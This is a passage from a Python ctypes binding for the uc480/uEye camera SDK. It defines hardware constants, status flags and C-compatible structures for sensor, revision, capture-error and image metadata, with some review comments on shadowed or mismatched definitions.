IS_BOARD_TYPE_UC480_ETH_SE = (IS_INTERFACE_TYPE_ETH + 0x01) # 0x81
IS_BOARD_TYPE_UC480_ETH_RE = IS_BOARD_TYPE_UC480_ETH_SE # 0x81
IS_BOARD_TYPE_UC480_ETH_CP = IS_BOARD_TYPE_UC480_ETH + 0x04 # 0x84
# ----------------------------------------------------------------------------
# camera type defines
# ----------------------------------------------------------------------------
# Camera types are aliases of the corresponding board types.
IS_CAMERA_TYPE_UC480_USB = IS_BOARD_TYPE_UC480_USB_SE
IS_CAMERA_TYPE_UC480_USB_SE = IS_BOARD_TYPE_UC480_USB_SE
IS_CAMERA_TYPE_UC480_USB_RE = IS_BOARD_TYPE_UC480_USB_RE
IS_CAMERA_TYPE_UC480_USB_ME = IS_BOARD_TYPE_UC480_USB_ME
IS_CAMERA_TYPE_UC480_USB_LE = IS_BOARD_TYPE_UC480_USB_LE
IS_CAMERA_TYPE_UC480_USB_ML = IS_BOARD_TYPE_UC480_USB_ML
IS_CAMERA_TYPE_UC480_USB3_CP = IS_BOARD_TYPE_UC480_USB3_CP
IS_CAMERA_TYPE_UC480_ETH = IS_BOARD_TYPE_UC480_ETH_HE
IS_CAMERA_TYPE_UC480_ETH_HE = IS_BOARD_TYPE_UC480_ETH_HE
IS_CAMERA_TYPE_UC480_ETH_SE = IS_BOARD_TYPE_UC480_ETH_SE
IS_CAMERA_TYPE_UC480_ETH_RE = IS_BOARD_TYPE_UC480_ETH_RE
IS_CAMERA_TYPE_UC480_ETH_CP = IS_BOARD_TYPE_UC480_ETH_CP
# ----------------------------------------------------------------------------
# readable operation system defines
# ----------------------------------------------------------------------------
IS_OS_UNDETERMINED = 0
IS_OS_WIN95 = 1
IS_OS_WINNT40 = 2
IS_OS_WIN98 = 3
IS_OS_WIN2000 = 4
IS_OS_WINXP = 5
IS_OS_WINME = 6
IS_OS_WINNET = 7
IS_OS_WINSERVER2003 = 8
IS_OS_WINVISTA = 9
IS_OS_LINUX24 = 10
IS_OS_LINUX26 = 11
IS_OS_WIN7 = 12
IS_OS_WIN8 = 13
# ----------------------------------------------------------------------------
# Bus speed
# ----------------------------------------------------------------------------
# Bit flags for bus types (comments give nominal bandwidth), then the same
# speeds as plain Mb/s numbers.
IS_USB_10 = 0x0001 # 1,5 Mb/s
IS_USB_11 = 0x0002 # 12 Mb/s
IS_USB_20 = 0x0004 # 480 Mb/s
IS_USB_30 = 0x0008 # 4000 Mb/s
IS_ETHERNET_10 = 0x0080 # 10 Mb/s
IS_ETHERNET_100 = 0x0100 # 100 Mb/s
IS_ETHERNET_1000 = 0x0200 # 1000 Mb/s
IS_ETHERNET_10000 = 0x0400 # 10000 Mb/s
IS_USB_LOW_SPEED = 1
IS_USB_FULL_SPEED = 12
IS_USB_HIGH_SPEED = 480
IS_USB_SUPER_SPEED = 4000
IS_ETHERNET_10Base = 10
IS_ETHERNET_100Base = 100
IS_ETHERNET_1000Base = 1000
IS_ETHERNET_10GBase = 10000
# ----------------------------------------------------------------------------
# HDR
# ----------------------------------------------------------------------------
IS_HDR_NOT_SUPPORTED = 0
IS_HDR_KNEEPOINTS = 1
IS_DISABLE_HDR = 0
IS_ENABLE_HDR = 1
# ----------------------------------------------------------------------------
# Test images
# ----------------------------------------------------------------------------
# One bit per sensor test pattern; the three commented values at the end are
# unassigned bits.
IS_TEST_IMAGE_NONE = 0x00000000
IS_TEST_IMAGE_WHITE = 0x00000001
IS_TEST_IMAGE_BLACK = 0x00000002
IS_TEST_IMAGE_HORIZONTAL_GREYSCALE = 0x00000004
IS_TEST_IMAGE_VERTICAL_GREYSCALE = 0x00000008
IS_TEST_IMAGE_DIAGONAL_GREYSCALE = 0x00000010
IS_TEST_IMAGE_WEDGE_GRAY = 0x00000020
IS_TEST_IMAGE_WEDGE_COLOR = 0x00000040
IS_TEST_IMAGE_ANIMATED_WEDGE_GRAY = 0x00000080
IS_TEST_IMAGE_ANIMATED_WEDGE_COLOR = 0x00000100
IS_TEST_IMAGE_MONO_BARS = 0x00000200
IS_TEST_IMAGE_COLOR_BARS1 = 0x00000400
IS_TEST_IMAGE_COLOR_BARS2 = 0x00000800
IS_TEST_IMAGE_GREYSCALE1 = 0x00001000
IS_TEST_IMAGE_GREY_AND_COLOR_BARS = 0x00002000
IS_TEST_IMAGE_MOVING_GREY_AND_COLOR_BARS = 0x00004000
IS_TEST_IMAGE_ANIMATED_LINE = 0x00008000
IS_TEST_IMAGE_ALTERNATE_PATTERN = 0x00010000
IS_TEST_IMAGE_VARIABLE_GREY = 0x00020000
IS_TEST_IMAGE_MONOCHROME_HORIZONTAL_BARS = 0x00040000
IS_TEST_IMAGE_MONOCHROME_VERTICAL_BARS = 0x00080000
IS_TEST_IMAGE_CURSOR_H = 0x00100000
IS_TEST_IMAGE_CURSOR_V = 0x00200000
IS_TEST_IMAGE_COLDPIXEL_GRID = 0x00400000
IS_TEST_IMAGE_HOTPIXEL_GRID = 0x00800000
IS_TEST_IMAGE_VARIABLE_RED_PART = 0x01000000
IS_TEST_IMAGE_VARIABLE_GREEN_PART = 0x02000000
IS_TEST_IMAGE_VARIABLE_BLUE_PART = 0x04000000
IS_TEST_IMAGE_SHADING_IMAGE = 0x08000000
IS_TEST_IMAGE_WEDGE_GRAY_SENSOR = 0x10000000
# 0x20000000
# 0x40000000
# 0x80000000
# ----------------------------------------------------------------------------
# Sensor scaler
# ----------------------------------------------------------------------------
IS_ENABLE_SENSOR_SCALER = 1
IS_ENABLE_ANTI_ALIASING = 2
# ----------------------------------------------------------------------------
# Timeouts
# ----------------------------------------------------------------------------
IS_TRIGGER_TIMEOUT = 0
# ----------------------------------------------------------------------------
# Auto pixel clock modes
# ----------------------------------------------------------------------------
IS_BEST_PCLK_RUN_ONCE = 0
# ----------------------------------------------------------------------------
# sequence flags
# ----------------------------------------------------------------------------
IS_LOCK_LAST_BUFFER = 0x8002
IS_GET_ALLOC_ID_OF_THIS_BUF = 0x8004
IS_GET_ALLOC_ID_OF_LAST_BUF = 0x8008
IS_USE_ALLOC_ID = 0x8000
IS_USE_CURRENT_IMG_SIZE = 0xC000
# ------------------------------------------
# Memory information flags
# ------------------------------------------
IS_GET_D3D_MEM = 0x8000
# ----------------------------------------------------------------------------
# Image files types
# ----------------------------------------------------------------------------
IS_IMG_BMP = 0
IS_IMG_JPG = 1
IS_IMG_PNG = 2
IS_IMG_RAW = 4
IS_IMG_TIF = 8
# ----------------------------------------------------------------------------
# I2C defines
# nRegisterAddr | IS_I2C_16_BIT_REGISTER
# ----------------------------------------------------------------------------
# Flags OR-ed into the I2C register/device address arguments.
IS_I2C_16_BIT_REGISTER = 0x10000000
IS_I2C_0_BIT_REGISTER = 0x20000000
# nDeviceAddr | IS_I2C_DONT_WAIT
IS_I2C_DONT_WAIT = 0x00800000
# ----------------------------------------------------------------------------
# DirectDraw steal video constants (Falcon)
# ----------------------------------------------------------------------------
IS_INIT_STEAL_VIDEO = 1
IS_EXIT_STEAL_VIDEO = 2
IS_INIT_STEAL_VIDEO_MANUAL = 3
IS_INIT_STEAL_VIDEO_AUTO = 4
IS_SET_STEAL_RATIO = 64
IS_USE_MEM_IMAGE_SIZE = 128
IS_STEAL_MODES_MASK = 7
IS_SET_STEAL_COPY = 0x1000
IS_SET_STEAL_NORMAL = 0x2000
# ----------------------------------------------------------------------------
# AGC modes (Falcon)
# ----------------------------------------------------------------------------
IS_GET_AGC_MODE = 0x8000
IS_SET_AGC_OFF = 0
IS_SET_AGC_ON = 1
# ----------------------------------------------------------------------------
# Gamma modes (Falcon)
# ----------------------------------------------------------------------------
IS_GET_GAMMA_MODE = 0x8000
IS_SET_GAMMA_OFF = 0
IS_SET_GAMMA_ON = 1
# ----------------------------------------------------------------------------
# sync levels (Falcon)
# ----------------------------------------------------------------------------
IS_GET_SYNC_LEVEL = 0x8000
IS_SET_SYNC_75 = 0
IS_SET_SYNC_125 = 1
# ----------------------------------------------------------------------------
# color bar modes (Falcon)
# ----------------------------------------------------------------------------
IS_GET_CBARS_MODE = 0x8000
IS_SET_CBARS_OFF = 0
IS_SET_CBARS_ON = 1
# ----------------------------------------------------------------------------
# horizontal filter defines (Falcon)
# ----------------------------------------------------------------------------
IS_GET_HOR_FILTER_MODE = 0x8000
IS_GET_HOR_FILTER_STEP = 0x8001
IS_DISABLE_HOR_FILTER = 0
IS_ENABLE_HOR_FILTER = 1
def IS_HOR_FILTER_STEP(_s_):
    """Map a horizontal-filter step index to its step value (0 -> 2, 1 -> 4, 2 -> 6, ...)."""
    # Successor doubled; equivalent to the C macro's ((s + 1) << 1).
    return 2 * (_s_ + 1)
# Precomputed step values matching IS_HOR_FILTER_STEP(0..2).
IS_HOR_FILTER_STEP1 = 2
IS_HOR_FILTER_STEP2 = 4
IS_HOR_FILTER_STEP3 = 6
# ----------------------------------------------------------------------------
# vertical filter defines (Falcon)
# ----------------------------------------------------------------------------
IS_GET_VERT_FILTER_MODE = 0x8000
IS_GET_VERT_FILTER_STEP = 0x8001
IS_DISABLE_VERT_FILTER = 0
IS_ENABLE_VERT_FILTER = 1
def IS_VERT_FILTER_STEP(_s_):
    """Encode vertical filter step *_s_* as its register value: step n maps to 2*(n+1)."""
    return (_s_ + 1) * 2
# precomputed results of IS_VERT_FILTER_STEP(0..2)
IS_VERT_FILTER_STEP1 = 2
IS_VERT_FILTER_STEP2 = 4
IS_VERT_FILTER_STEP3 = 6
# ----------------------------------------------------------------------------
# scaler modes (Falcon) -- note: these are deliberately floats, unlike the
# integer mode constants elsewhere in this file
# ----------------------------------------------------------------------------
IS_GET_SCALER_MODE = float( 1000)
IS_SET_SCALER_OFF = float( 0)
IS_SET_SCALER_ON = float( 1)
IS_MIN_SCALE_X = float( 6.25)
IS_MAX_SCALE_X = float( 100.00)
IS_MIN_SCALE_Y = float( 6.25)
IS_MAX_SCALE_Y = float( 100.00)
# ----------------------------------------------------------------------------
# video source selectors (Falcon)
# ----------------------------------------------------------------------------
IS_GET_VIDEO_IN = 0x8000
IS_GET_VIDEO_PASSTHROUGH = 0x8000
IS_GET_VIDEO_IN_TOGGLE = 0x8001
IS_GET_TOGGLE_INPUT_1 = 0x8000
IS_GET_TOGGLE_INPUT_2 = 0x8001
IS_GET_TOGGLE_INPUT_3 = 0x8002
IS_GET_TOGGLE_INPUT_4 = 0x8003
IS_SET_VIDEO_IN_1 = 0x00
IS_SET_VIDEO_IN_2 = 0x01
IS_SET_VIDEO_IN_S = 0x02
IS_SET_VIDEO_IN_3 = 0x03
IS_SET_VIDEO_IN_4 = 0x04
IS_SET_VIDEO_IN_1S = 0x10
IS_SET_VIDEO_IN_2S = 0x11
IS_SET_VIDEO_IN_3S = 0x13
IS_SET_VIDEO_IN_4S = 0x14
IS_SET_VIDEO_IN_EXT = 0x40
IS_SET_TOGGLE_OFF = 0xFF
IS_SET_VIDEO_IN_SYNC = 0x4000
# ----------------------------------------------------------------------------
# video crossbar selectors (Falcon)
# ----------------------------------------------------------------------------
IS_GET_CROSSBAR = 0x8000
IS_CROSSBAR_1 = 0
IS_CROSSBAR_2 = 1
IS_CROSSBAR_3 = 2
IS_CROSSBAR_4 = 3
IS_CROSSBAR_5 = 4
IS_CROSSBAR_6 = 5
IS_CROSSBAR_7 = 6
IS_CROSSBAR_8 = 7
IS_CROSSBAR_9 = 8
IS_CROSSBAR_10 = 9
IS_CROSSBAR_11 = 10
IS_CROSSBAR_12 = 11
IS_CROSSBAR_13 = 12
IS_CROSSBAR_14 = 13
IS_CROSSBAR_15 = 14
IS_CROSSBAR_16 = 15
IS_SELECT_AS_INPUT = 128
# ----------------------------------------------------------------------------
# video format selectors (Falcon)
# ----------------------------------------------------------------------------
IS_GET_VIDEO_MODE = 0x8000
IS_SET_VM_PAL = 0
IS_SET_VM_NTSC = 1
IS_SET_VM_SECAM = 2
IS_SET_VM_AUTO = 3
# ----------------------------------------------------------------------------
# capture modes (Falcon) -- bit flags; may be OR-ed together as in
# IS_SET_CM_BOTHFIELDS below
# ----------------------------------------------------------------------------
IS_GET_CAPTURE_MODE = 0x8000
IS_SET_CM_ODD = 0x0001
IS_SET_CM_EVEN = 0x0002
IS_SET_CM_FRAME = 0x0004
IS_SET_CM_NONINTERLACED = 0x0008
IS_SET_CM_NEXT_FRAME = 0x0010
IS_SET_CM_NEXT_FIELD = 0x0020
IS_SET_CM_BOTHFIELDS = (IS_SET_CM_ODD | IS_SET_CM_EVEN | IS_SET_CM_NONINTERLACED)
IS_SET_CM_FRAME_STEREO = 0x2004
# ----------------------------------------------------------------------------
# display update mode constants (Falcon)
# ----------------------------------------------------------------------------
IS_GET_UPDATE_MODE = 0x8000
IS_SET_UPDATE_TIMER = 1
IS_SET_UPDATE_EVENT = 2
# ----------------------------------------------------------------------------
# sync generator mode constants (Falcon)
# ----------------------------------------------------------------------------
IS_GET_SYNC_GEN = 0x8000
IS_SET_SYNC_GEN_OFF = 0
IS_SET_SYNC_GEN_ON = 1
# ----------------------------------------------------------------------------
# decimation modes (Falcon)
# ----------------------------------------------------------------------------
IS_GET_DECIMATION_MODE = 0x8000
IS_GET_DECIMATION_NUMBER = 0x8001
IS_DECIMATION_OFF = 0
IS_DECIMATION_CONSECUTIVE = 1
IS_DECIMATION_DISTRIBUTED = 2
# ----------------------------------------------------------------------------
# hardware watchdog defines (Falcon)
# ----------------------------------------------------------------------------
IS_GET_WATCHDOG_TIME = 0x2000
IS_GET_WATCHDOG_RESOLUTION = 0x4000
IS_GET_WATCHDOG_ENABLE = 0x8000
IS_WATCHDOG_MINUTES = 0
IS_WATCHDOG_SECONDS = 0x8000
IS_DISABLE_WATCHDOG = 0
IS_ENABLE_WATCHDOG = 1
IS_RETRIGGER_WATCHDOG = 2
IS_ENABLE_AUTO_DEACTIVATION = 4
IS_DISABLE_AUTO_DEACTIVATION = 8
IS_WATCHDOG_RESERVED = 0x1000
# ----------------------------------------------------------------------------
# typedefs
# ----------------------------------------------------------------------------
# camera handle: a DWORD id, not a pointer
HCAM = wt.DWORD
# ----------------------------------------------------------------------------
# invalid values for device handles
# ----------------------------------------------------------------------------
IS_INVALID_HCAM = 0
class BOARDINFO(ctypes.Structure):
    """ctypes layout of the SDK's board/camera identification block.

    :var ctypes.c_char[12] SerNo: Serial number of sensor chip.
    :var ctypes.c_char[20] ID: Camera ID.
    :var ctypes.c_char[10] Version:
    :var ctypes.c_char[12] Date:
    :var ctypes.c_ubyte Select:
    :var ctypes.c_ubyte Type:
    :var ctypes.c_char[8] Reserved:
    """
    _fields_ = [("SerNo", ctypes.c_char * 12),
                ("ID", ctypes.c_char * 20),
                ("Version", ctypes.c_char * 10),
                ("Date", ctypes.c_char * 12),
                ("Select", ctypes.c_ubyte),
                ("Type", ctypes.c_ubyte),
                ("Reserved", ctypes.c_char * 8)]
# ----------------------------------------------------------------------------
# info struct
# ----------------------------------------------------------------------------
# FALCINFO/CAMINFO are plain aliases for BOARDINFO (same layout, SDK-style names)
FALCINFO = BOARDINFO
PFALCINFO = ctypes.POINTER(BOARDINFO)
CAMINFO = BOARDINFO
PCAMINFO = ctypes.POINTER(BOARDINFO)
class SENSORINFO(ctypes.Structure):
    """ctypes layout of the SDK's sensor description block.

    :var WORD SensorID:
    :var ctypes.c_char[32] strSensorName:
    :var BYTE nColorMode:
    :var DWORD nMaxWidth:
    :var DWORD nMaxHeight:
    :var BOOL bMasterGain:
    :var BOOL bRGain:
    :var BOOL bGGain:
    :var BOOL bBGain:
    :var WORD wPixelSize:
    :var ctypes.c_char[14] Reserved:
    """
    _fields_ = [("SensorID", wt.WORD),
                ("strSensorName", ctypes.c_char * 32),
                ("nColorMode", wt.BYTE),
                ("nMaxWidth", wt.DWORD),
                ("nMaxHeight", wt.DWORD),
                ("bMasterGain", wt.BOOL),
                ("bRGain", wt.BOOL),
                ("bGGain", wt.BOOL),
                ("bBGain", wt.BOOL),
                ("wPixelSize", wt.WORD),
                ("Reserved", ctypes.c_char * 14)]
class REVISIONINFO(ctypes.Structure):
    """Hardware/firmware revision numbers of the camera's components.

    :var WORD size:
    :var WORD Sensor:
    :var WORD Cypress:
    :var DWORD Blackfin:
    :var WORD DspFirmware:
    :var WORD USB_Board:
    :var WORD Sensor_Board:
    :var WORD Processing_Board:
    :var WORD Memory_Board:
    :var WORD Housing:
    :var WORD Filter:
    :var WORD Timing_Board:
    :var WORD Product:
    :var WORD Power_Board:
    :var WORD Logic_Board:
    :var WORD FX3:
    :var WORD FPGA:
    :var ctypes.c_char[92] Reserved:

    NOTE(review): the docstring previously listed Power_Board twice and declared
    Blackfin as WORD while the field below is DWORD; docstring now matches the
    code. Whether Blackfin should really be DWORD (vs WORD in the SDK header)
    should be verified against the vendor uc480/uEye header.
    """
    _fields_ = [("size", wt.WORD),
                ("Sensor", wt.WORD),
                ("Cypress", wt.WORD),
                ("Blackfin", wt.DWORD),
                ("DspFirmware", wt.WORD),
                ("USB_Board", wt.WORD),
                ("Sensor_Board", wt.WORD),
                ("Processing_Board", wt.WORD),
                ("Memory_Board", wt.WORD),
                ("Housing", wt.WORD),
                ("Filter", wt.WORD),
                ("Timing_Board", wt.WORD),
                ("Product", wt.WORD),
                ("Power_Board", wt.WORD),
                ("Logic_Board", wt.WORD),
                ("FX3", wt.WORD),
                ("FPGA", wt.WORD),
                ("Reserved", ctypes.c_char * 92)]
# ----------------------------------------------------------------------------
# Capture errors -- numeric error codes reported per capture
# ----------------------------------------------------------------------------
IS_CAPERR_API_NO_DEST_MEM= 0xa2
IS_CAPERR_API_CONVERSION_FAILED= 0xa3
IS_CAPERR_API_IMAGE_LOCKED= 0xa5
IS_CAPERR_DRV_OUT_OF_BUFFERS= 0xb2
IS_CAPERR_DRV_DEVICE_NOT_READY= 0xb4
IS_CAPERR_USB_TRANSFER_FAILED= 0xc7
IS_CAPERR_DEV_TIMEOUT= 0xd6
IS_CAPERR_ETH_BUFFER_OVERRUN= 0xe4
IS_CAPERR_ETH_MISSED_IMAGES= 0xe5
class UC480_CAPTURE_ERROR_INFO(ctypes.Structure):
    """Capture-error counters; adwCapErrCnt_Detail is indexed by error code.

    :var DWORD dwCapErrCnt_Total:
    :var BYTE[60] reserved:
    :var DWORD[256] adwCapErrCnt_Detail:
    """
    _fields_ = [("dwCapErrCnt_Total", wt.DWORD),
                ("reserved", wt.BYTE * 60),
                ("adwCapErrCnt_Detail", wt.DWORD * 256)] #: Attributes
# capture status codes: same values as the IS_CAPERR_* codes above
IS_CAP_STATUS_API_NO_DEST_MEM = 0xa2
IS_CAP_STATUS_API_CONVERSION_FAILED = 0xa3
IS_CAP_STATUS_API_IMAGE_LOCKED = 0xa5
IS_CAP_STATUS_DRV_OUT_OF_BUFFERS = 0xb2
IS_CAP_STATUS_DRV_DEVICE_NOT_READY = 0xb4
IS_CAP_STATUS_USB_TRANSFER_FAILED = 0xc7
IS_CAP_STATUS_DEV_TIMEOUT = 0xd6
IS_CAP_STATUS_ETH_BUFFER_OVERRUN = 0xe4
IS_CAP_STATUS_ETH_MISSED_IMAGES = 0xe5
class UC480_CAPTURE_STATUS_INFO(ctypes.Structure):
    """Capture-status counters; same layout as UC480_CAPTURE_ERROR_INFO.

    :var DWORD dwCapStatusCnt_Total:
    :var BYTE[60] reserved:
    :var DWORD[256] adwCapStatusCnt_Detail:
    """
    _fields_ = [("dwCapStatusCnt_Total", wt.DWORD),
                ("reserved", wt.BYTE * 60),
                ("adwCapStatusCnt_Detail", wt.DWORD * 256)]
IS_CAPTURE_STATUS_INFO_CMD_RESET = 1
IS_CAPTURE_STATUS_INFO_CMD_GET = 2
class UC480_CAMERA_INFO(ctypes.Structure):
    """One entry of the camera enumeration list.

    :var DWORD dwCameraID:
    :var DWORD dwDeviceID:
    :var DWORD dwSensorID:
    :var DWORD dwInUse:
    :var ctypes.c_char[16] SerNo:
    :var ctypes.c_char[16] Model:
    :var DWORD dwStatus:
    :var DWORD[15] dwReserved:
    """
    _fields_ = [("dwCameraID", wt.DWORD),
                ("dwDeviceID", wt.DWORD),
                ("dwSensorID", wt.DWORD),
                ("dwInUse", wt.DWORD),
                ("SerNo", ctypes.c_char * 16),
                ("Model", ctypes.c_char * 16),
                ("dwStatus", wt.DWORD),
                ("dwReserved", wt.DWORD * 15)]
# usage of the list:
# 1. call the DLL with .dwCount = 0
# 2. DLL returns .dwCount = N (N = number of available cameras)
# 3. call DLL with .dwCount = N and a pointer to UC480_CAMERA_LIST with
#    an array of UC480_CAMERA_INFO[N]
# 4. DLL will fill in the array with the camera infos and
#    will update the .dwCount member with the actual number of cameras
#    because there may be a change in number of cameras between step 2 and 3
# 5. check if there's a difference in actual .dwCount and formerly
#    reported value of N and call DLL again with an updated array size
# class UC480_CAMERA_LIST(ctypes.Structure):
#     _fields_ = [("dwCount", wt.ULONG),
#                 ("uci", ctypes.POINTER(UC480_CAMERA_INFO))]
def create_camera_list(dwCount):
    """Return a UC480_CAMERA_LIST whose *uci* array is dimensioned for exactly *dwCount* entries.

    :param ULONG dwCount: Number of camera info structures requested.
    :returns: UC480_CAMERA_LIST
    :var ULONG dwCount: Size of uci.
    :var UC480_CAMERA_INFO[dwCount] uci: List of camera info structures.
    """
    # the array length must be baked into the type, so the class is built per call
    class UC480_CAMERA_LIST(ctypes.Structure):
        _fields_ = [("dwCount", wt.ULONG),
                    ("uci", UC480_CAMERA_INFO * dwCount)]
    # keyword construction zero-fills the array and stores dwCount in one step
    return UC480_CAMERA_LIST(dwCount=dwCount)
# ----------------------------------------------------------------------------
# the following defines are the status bits of the dwStatus member of
# the UC480_CAMERA_INFO structure
FIRMWARE_DOWNLOAD_NOT_SUPPORTED = 0x00000001
INTERFACE_SPEED_NOT_SUPPORTED = 0x00000002
INVALID_SENSOR_DETECTED = 0x00000004
AUTHORIZATION_FAILED = 0x00000008
DEVSTS_INCLUDED_STARTER_FIRMWARE_INCOMPATIBLE = 0x00000010
# the following macro determines the availability of the camera based
# on the status flags
def IS_CAMERA_AVAILABLE(_s_):
    """Return True when none of the four blocking status bits is set in *_s_*."""
    blocking = (FIRMWARE_DOWNLOAD_NOT_SUPPORTED
                | INTERFACE_SPEED_NOT_SUPPORTED
                | INVALID_SENSOR_DETECTED
                | AUTHORIZATION_FAILED)
    return (_s_ & blocking) == 0
# ----------------------------------------------------------------------------
# auto feature structs and definitions
# ----------------------------------------------------------------------------
# AC_* are bit flags describing the auto-control abilities
AC_SHUTTER = 0x00000001
AC_GAIN = 0x00000002
AC_WHITEBAL = 0x00000004
AC_WB_RED_CHANNEL = 0x00000008
AC_WB_GREEN_CHANNEL = 0x00000010
AC_WB_BLUE_CHANNEL = 0x00000020
AC_FRAMERATE = 0x00000040
AC_SENSOR_SHUTTER = 0x00000080
AC_SENSOR_GAIN = 0x00000100
AC_SENSOR_GAIN_SHUTTER = 0x00000200
AC_SENSOR_FRAMERATE = 0x00000400
AC_SENSOR_WB = 0x00000800
AC_SENSOR_AUTO_REFERENCE = 0x00001000
AC_SENSOR_AUTO_SPEED = 0x00002000
AC_SENSOR_AUTO_HYSTERESIS= 0x00004000
AC_SENSOR_AUTO_SKIPFRAMES= 0x00008000
ACS_ADJUSTING = 0x00000001
ACS_FINISHED = 0x00000002
ACS_DISABLED = 0x00000004
class AUTO_BRIGHT_STATUS(ctypes.Structure):
    """Status of the automatic brightness controller.

    :var DWORD curValue:
    :var ctypes.c_long curError:
    :var DWORD curController:
    :var DWORD curCtrlStatus:
    """
    _fields_ = [("curValue", wt.DWORD),
                ("curError", ctypes.c_long),
                ("curController", wt.DWORD),
                ("curCtrlStatus", wt.DWORD)]
class AUTO_WB_CHANNNEL_STATUS(ctypes.Structure):
    """Per-channel status of the automatic white-balance controller.

    NOTE: the triple-N in the class name is the wrapper's original spelling;
    do not "fix" it without updating all callers.

    :var DWORD curValue:
    :var ctypes.c_long curError:
    :var DWORD curCtrlStatus:
    """
    _fields_ = [("curValue", wt.DWORD),
                ("curError", ctypes.c_long),
                ("curCtrlStatus", wt.DWORD)]
class AUTO_WB_STATUS(ctypes.Structure):
    """Combined RGB status of the automatic white-balance controller.

    :var AUTO_WB_CHANNNEL_STATUS RedChannel:
    :var AUTO_WB_CHANNNEL_STATUS GreenChannel:
    :var AUTO_WB_CHANNNEL_STATUS BlueChannel:
    :var DWORD curController:
    """
    _fields_ = [("RedChannel", AUTO_WB_CHANNNEL_STATUS),
                ("GreenChannel", AUTO_WB_CHANNNEL_STATUS),
                ("BlueChannel", AUTO_WB_CHANNNEL_STATUS),
                ("curController", wt.DWORD)]
class UC480_AUTO_INFO(ctypes.Structure):
    """Auto-feature capability/status block.

    NOTE(review): this class is immediately redefined below, so this
    definition is shadowed and unreachable under its name.

    :var DWORD AutoAbility:
    :var AUTO_BRIGHT_STATUS sBrightCtrlStatus:
    :var AUTO_WB_STATUS sWBCtrlStatus:
    :var DWORD AShutterPhotomCaps:
    :var DWORD AGainPhotomCaps:
    :var DWORD AAntiFlickerCaps:
    :var DWORD SensorWBModeCaps:
    :var DWORD[8] reserved:
    """
    _fields_ = [("AutoAbility", wt.DWORD),
                ("sBrightCtrlStatus", AUTO_BRIGHT_STATUS),
                ("sWBCtrlStatus", AUTO_WB_STATUS),
                ("AShutterPhotomCaps", wt.DWORD),
                ("AGainPhotomCaps", wt.DWORD),
                ("AAntiFlickerCaps", wt.DWORD),
                ("SensorWBModeCaps", wt.DWORD),
                ("reserved", wt.DWORD * 8)]
class UC480_AUTO_INFO(ctypes.Structure):
    """NOTE(review): redefines UC480_AUTO_INFO, shadowing the definition
    above. The fields (nSize/hDC/nCx/nCy) look like a device-context/display
    descriptor, so this is probably a misnamed copy-paste -- confirm the
    intended class name against the vendor SDK header before renaming.

    :var ctypes.c_uint nSize:
    :var ctypes.c_void_p hDC:
    :var ctypes.c_uint nCx:
    :var ctypes.c_uint nCy:
    """
    _fields_ = [("nSize", ctypes.c_uint),
                ("hDC", ctypes.c_void_p),
                ("nCx", ctypes.c_uint),
                ("nCy", ctypes.c_uint)]
class KNEEPOINT(ctypes.Structure):
    """A single (x, y) kneepoint of a camera response curve.

    :var ctypes.c_double x:
    :var ctypes.c_double y:
    """
    _fields_ = [("x", ctypes.c_double),
                ("y", ctypes.c_double)]
class KNEEPOINTARRAY(ctypes.Structure):
    """Fixed-capacity array of up to 10 kneepoints; only the first
    NumberOfUsedKneepoints entries are meaningful.

    :var ctypes.c_int NumberOfUsedKneepoints:
    :var KNEEPOINT[10] Kneepoint:
    """
    _fields_ = [("NumberOfUsedKneepoints", ctypes.c_int),
                ("Kneepoint", KNEEPOINT * 10)]
class KNEEPOINTINFO(ctypes.Structure):
    """Capabilities and value ranges for kneepoint configuration.

    :var ctypes.c_int NumberOfSupportedKneepoints:
    :var ctypes.c_int NumberOfUsedKneepoints:
    :var ctypes.c_double MinValueX:
    :var ctypes.c_double MaxValueX:
    :var ctypes.c_double MinValueY:
    :var ctypes.c_double MaxValueY:
    :var KNEEPOINT[10] DefaultKneepoint:
    :var ctypes.c_int[10] Reserved:
    """
    _fields_ = [("NumberOfSupportedKneepoints", ctypes.c_int),
                ("NumberOfUsedKneepoints", ctypes.c_int),
                ("MinValueX", ctypes.c_double),
                ("MaxValueX", ctypes.c_double),
                ("MinValueY", ctypes.c_double),
                ("MaxValueY", ctypes.c_double),
                ("DefaultKneepoint", KNEEPOINT * 10),
                ("Reserved", ctypes.c_int * 10)]
IS_SE_STARTER_FW_UPLOAD = 0x00000001 # !< get estimated duration of GigE SE starter firmware upload in milliseconds
IS_CP_STARTER_FW_UPLOAD = 0x00000002 # !< get estimated duration of GigE CP starter firmware upload in milliseconds
IS_STARTER_FW_UPLOAD = 0x00000004 # !< get estimated duration of starter firmware upload in milliseconds using hCam to
class SENSORSCALERINFO(ctypes.Structure):
    """Current mode and supported range of the internal sensor scaler.

    :var ctypes.c_int nCurrMode:
    :var ctypes.c_int nNumberOfSteps:
    :var ctypes.c_double dblFactorIncrement:
    :var ctypes.c_double dblMinFactor:
    :var ctypes.c_double dblMaxFactor:
    :var ctypes.c_double dblCurrFactor:
    :var ctypes.c_int nSupportedModes:
    :var ctypes.c_byte[84] bReserved:
    """
    _fields_ = [("nCurrMode", ctypes.c_int),
                ("nNumberOfSteps", ctypes.c_int),
                ("dblFactorIncrement", ctypes.c_double),
                ("dblMinFactor", ctypes.c_double),
                ("dblMaxFactor", ctypes.c_double),
                ("dblCurrFactor", ctypes.c_double),
                ("nSupportedModes", ctypes.c_int),
                ("bReserved", ctypes.c_byte * 84)]
class UC480TIME(ctypes.Structure):
    """Broken-down timestamp as delivered by the camera/driver.

    :var WORD wYear:
    :var WORD wMonth:
    :var WORD wDay:
    :var WORD wHour:
    :var WORD wMinute:
    :var WORD wSecond:
    :var WORD wMilliseconds:
    :var BYTE[10] byReserved:
    """
    _fields_ = [("wYear", wt.WORD),
                ("wMonth", wt.WORD),
                ("wDay", wt.WORD),
                ("wHour", wt.WORD),
                ("wMinute", wt.WORD),
                ("wSecond", wt.WORD),
                ("wMilliseconds", wt.WORD),
                ("byReserved", wt.BYTE * 10)]
class UC480IMAGEINFO(ctypes.Structure):
    """Per-image metadata (timestamps, AOI bookkeeping, buffer usage).

    :var DWORD dwFlags:
    :var BYTE[4] byReserved1:
    :var ctypes.c_ulonglong u64TimestampDevice:
    :var UC480TIME TimestampSystem:
    :var DWORD dwIoStatus:
    :var WORD wAOIIndex:
    :var WORD wAOICycle:
    :var ctypes.c_ulonglong u64FrameNumber:
    :var DWORD dwImageBuffers:
    :var DWORD dwImageBuffersInUse:
    :var DWORD dwReserved3:
    :var DWORD dwImageHeight:
    :var DWORD dwImageWidth:
    """
    _fields_ = [("dwFlags", wt.DWORD),
                ("byReserved1", wt.BYTE * 4),
                ("u64TimestampDevice", ctypes.c_ulonglong),
